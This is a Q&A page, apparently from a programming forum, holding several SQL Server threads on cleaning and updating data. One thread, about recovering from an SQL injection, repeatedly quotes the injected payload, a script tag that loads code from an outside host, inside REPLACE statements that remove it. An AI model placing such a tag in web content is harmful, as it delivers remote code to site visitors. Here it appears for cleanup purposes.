I have multiple tables with corrupted data like this:
Good data</title>and some random HTML<p></p><
What I would like to do is only keep "Good data" in the cell and remove everything else. I thought I can just create a small project with EF and clean the db with C# but there might be a quicker solution with SQL only? Can you use regex or some kind of substring function in SQL?
I will manually look at the table and select the field that needs to run through the code, there is no need to automate that at this point.
UPDATE dbo.SQLInjectionVictimTableName
SET UnprotectedColumn = LEFT(UnprotectedColumn, CHARINDEX('<', UnprotectedColumn) - 1)
WHERE UnprotectedColumn LIKE '%<%';
If good data is consistently followed by </, you could use:
UPDATE YourTable
SET BadField = LEFT(Badfield,CHARINDEX('</',BadField)-1)
WHERE CHARINDEX('</',Badfield) > 0
Related
I'm trying to create an Update Query in MS Access (2013) to a QuickBooks Database using QODBC.
I need to update the table PriceLevelPerItem. I am trying to update the field in said table called PriceLevelPerItemCustomprice with a value from another table, QueryThreeTable, and a column titled UpdatedPrice.
I need to update the table PriceLevelPerItem where the PriceLevelPerItemItemRefListID matches the value of ItemID from QueryThreeTable and ListID matches the QueryThreeTable.ItemListID (yes I know these are the wrong way around...)
So far this process has been a very annoying trial of many queries and any help would be greatly appreciated
This is what I've been working with:
UPDATE
PriceLevelPerItem
SET
(PriceLevelPerItemCustomPrice = QueryThreeTable.UpdatedPrice)
FROM
QueryThreeTable, PriceLevelPerItem
WHERE
QueryThreeTable.ItemID = PriceLevelPerItem.PriceLevelPerItemItemRefListID
AND
QueryThreeTable.ItemListID = PriceLevelPerItem.ListID;
I think the problem is that you're trying to use a DAO query inside a QODBC query. I think the two use different Data Access engines.
You're going to need to lookup your UpdatedPrice in your QueryThreeTable using DLookup. Or maybe you need to create a DAO loop using QueryThreeTable that then updates values in your QODBC table from there.
Make your QODBC query work without the use of QueryThreeTable and without any joins. Then come up with a way to dynamically create your query. You're resulting SQL should look something like this:
UPDATE
PriceLevelPerItem
SET
PriceLevelPerItemCustomPrice = 150.16
WHERE
PriceLevelPerItem.ListID = '310000-1146238368';
Pretty simple one today. I've got a column, let's call it title, with a bunch of project titles. What I need to to pull everything from the left of the ":" and do a left/right trim (I'm then going to be using that in a join later on but I just need a column with the new data for now). So here's an example of what the current column looks like:
And here's what I need it to look like after the query is run:
The problem is while the # are 6 characters now, I can't guarantee they'll always be 6 characters. So if I was doing this in Excel I'd use the deliminated feature or just write a left/len/search function. Wondering how to do the same in SQL. BTW, I'm using SQL Server Management Studio.
Thoughts?
Assuming that your number is always followed by a [space]:[space], then simply look for that first space, and use its location as the argument for a left-substring operation:
SELECT LEFT(Title, CHARINDEX(' ', Title, 0)) AS "New Title"
p.s. Just say you're using MS SQL Server. SSMS is just a management front-end for that database.
check this post out. it does exactly what you are trying to do.
SQL Server replace, remove all after certain character
A website I am host was recently SQL injected, and I want to find a way to remove the offending injected code from a particular column (comments) in the database. Using SQL Server 2008, I'm not sure why this isn't working:
USE Dirty
SELECT REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
FROM SALONS
You're only selecting - not updating....
Try this:
USE Dirty
UPDATE dbo.Salons
SET Comments = REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
WHERE (possibly a condition here...)
You are not actually updating anything, merely selecting it. You need to create an update statement
USE Dirty
UPDATE SALONS
SET comments = REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
Because the column was "ntext" that was causing an error. I managed to fix this with using a cast like this:
USE Dirty
UPDATE dbo.Salons
SET Comments = cast(replace(cast(comments as varchar(8000)),'</title><script src=http://hjfghj.com/r.php ></script>','') as ntext)
is there a way to actually query the database in a such a way to search for a particular value in every table across the whole database ?
Something like a file search in Eclipse, it searches accross the whole worspace and project ?
Sorry about that .. its MS SQL 2005
SQL Workbench/J has a built in tool and command to do that.
It's JDBC based and should also work with SQL Server.
You will need to use the LIKE operator, and search through each field separately. i.e.
SELECT * FROM <table name>
WHERE (<field name1> LIKE '%<search value>%') OR
(<field name2> LIKE '%<search value>%') OR
... etc.
This isn't a quick way though.
I think the best way would be to
1) programatically generate the query and run it
2) use a GUI tool for the SQL server you are using which provides this functionality.
In mysql you can use union operator like
(SELECT * from table A where name = 'abc') UNION (SELECT * from
table B where middlename = 'pqr')
and so on
use full text search for efficency
http://dev.mysql.com/doc/refman/5.0/en/fulltext-search.html
Well, your best bet is to write a procedure to do this. But to give you some pointers you can use the INFORMATION_SCHEMA.Tables to get a list of all the tables in a given database and INFORMATION_SCHEMA.Columns to get a list of all columns. These tables also give you the datatype of columns. So you will need a few loops on these tables to do the magic.
It should be mentioned most RDBMSs nowadays support these schemas.
In phpmyadmin, go to your database, reach the search tab.
Here you will be able to select all of your tables and search through your entire db in one time.
is there a simple way to just output each record in a select statement to write to its own file?
for example, if you have the tsql query in sql server 2005,
select top 10 items, names + ':' + address from book
and you ended up with 10 text files with the individual name and addresses in each file.
is there a way to do this without writing an extensive spWriteStringToFile procedure? I'm hoping there is some kind of output setting or something in the select statement.
thanks in advance
SQL returns the result set first, there's no opportunity in there for writing records to specific files until afterwards.
Being SQL Server 2005, it's possible you could use a SQLCLR (.NET 2.0 code) function in a SQL statement without having to make a separate application.
In SSMS, you can do a results to file, but that wouldnt split each record out into its own file. I pretty sure you cannot do this out of the box, so it sounds like you will be rolling your own solution.
You'd do this in some client, be it Java, VBA or SSIS typically.